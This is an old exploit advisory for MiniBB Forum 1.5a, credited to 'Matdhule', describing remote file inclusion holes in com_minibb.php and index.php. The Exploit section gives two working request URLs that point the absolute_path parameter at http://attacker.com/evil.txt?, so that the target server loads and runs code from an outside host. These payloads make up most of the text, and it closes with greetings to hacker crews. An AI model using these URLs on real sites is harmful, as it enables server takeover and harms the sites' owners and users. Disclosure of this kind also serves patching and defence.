MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

------------------------------------------------------------------------
---------

MiniBB Forum <= 1.5a Remote File Include Vulnerabilities

------------------------------------------------------------------------
---------

Author : Matdhule

Contact : matdhule (at) gmail (dot) com [email concealed]

Application : MiniBB Forum (com_minibb.php & index.php)

Version : 1.5a

------------------------------------------------------------------------
---------

Exploit :

http://[target]/[path]/components/com_minibb.php?absolute_path=http://at
tacker.com/evil.txt?

http://[target]/[path]/components/minibb/index.php?absolute_path=http://
attacker.com/evil.txt?

------------------------------------------------------------------------
---------

Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, & all crews #mardongan, #jambihackerlink @dalnet